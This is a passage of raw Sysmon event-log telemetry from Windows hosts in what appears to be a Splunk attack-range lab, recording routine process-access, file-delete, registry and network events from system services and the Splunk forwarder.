\ntdll.dll+51791 10341000x8000000000000000219006Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:49.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219005Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:49.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219004Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:49.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219003Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:49.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219002Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:49.425{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1495-6216-B804-000000003902}2628C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219001Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:49.425{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1495-6216-B804-000000003902}2628C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219000Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:49.426{4F8D34B0-1495-6216-B804-000000003902}2628C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218999Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:49.378{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE72B24D7D60AC32476AA68ECF6BD7E6,SHA256=3A6560EBF8AE1588BB647110BFC692241690A8ED50ED39865CAE20E5FD34E772,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218998Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:46.301{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx56539-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000218997Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:49.065{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=335C79D1E6FC8B271CF6C9EAF42CA137,SHA256=88AF8D8469BA5874339AB57751940236BBA59ABB0238416727E0D0B37E0BECCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294785Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:49.449{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E764ED9175C95E22106BDAE54BE6593,SHA256=83C0ED31F2755ED0C31646F57DB4AEB93992F64C6B2E9C418E7165178A50C21F,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000294791Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:03:50.866{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\6FC0DF5C-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_6FC0DF5C-0000-0000-0000-100000000000.XML 13241300x8000000000000000294790Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:03:50.851{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\BA30863B-E0B8-488B-829D-A0E9DE6AE59C\Config SourceDWORD (0x00000001) 13241300x8000000000000000294789Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:03:50.851{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\BA30863B-E0B8-488B-829D-A0E9DE6AE59C\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_BA30863B-E0B8-488B-829D-A0E9DE6AE59C.XML 10341000x8000000000000000294788Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:50.832{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294787Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:50.831{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294786Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:50.451{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DA7CE2FBD558C020DBD41C552BD7F8A,SHA256=E1E79C497E57B8A06067D2B894A3EDF734DBFEDFD94836D8C0F3678A173A581E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219030Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:50.784{4F8D34B0-1496-6216-B904-000000003902}38443276C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000219029Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:50.615{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=04E0CE1B00EBEB8CC58D67B6C56411B9,SHA256=3C90DC007C50B90E79152AF2C26D376CDB190B750544A71798FAC5B10CF7EF29,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219028Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:50.315{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1496-6216-B904-000000003902}3844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219027Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:50.315{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219026Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:50.315{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219025Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:50.315{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219024Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:50.315{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219023Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:50.315{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219022Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:50.315{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219021Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:50.315{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219020Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:50.315{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219019Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:50.315{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219018Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:50.315{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1496-6216-B904-000000003902}3844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219017Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:50.315{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1496-6216-B904-000000003902}3844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 